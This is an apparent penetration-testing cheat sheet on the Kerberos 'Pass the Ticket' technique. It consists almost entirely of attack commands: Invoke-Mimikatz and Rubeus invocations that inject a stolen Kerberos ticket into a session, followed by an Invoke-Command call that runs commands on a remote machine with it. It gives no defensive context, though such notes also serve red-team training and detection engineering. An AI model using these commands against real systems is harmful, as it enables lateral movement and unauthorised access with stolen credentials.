# Pass the Ticket (PtT)

## Invoke-Mimikatz

```powershell
Invoke-Mimikatz -Command '"kerberos::ptt <ticket.kirbi>"'
Invoke-Command -ComputerName <computer-name> -ScriptBlock {hostname; whoami; ipconfig}
```

## Rubeus

```
.\Rubeus.exe ptt /ticket:<ticket-base64>
```
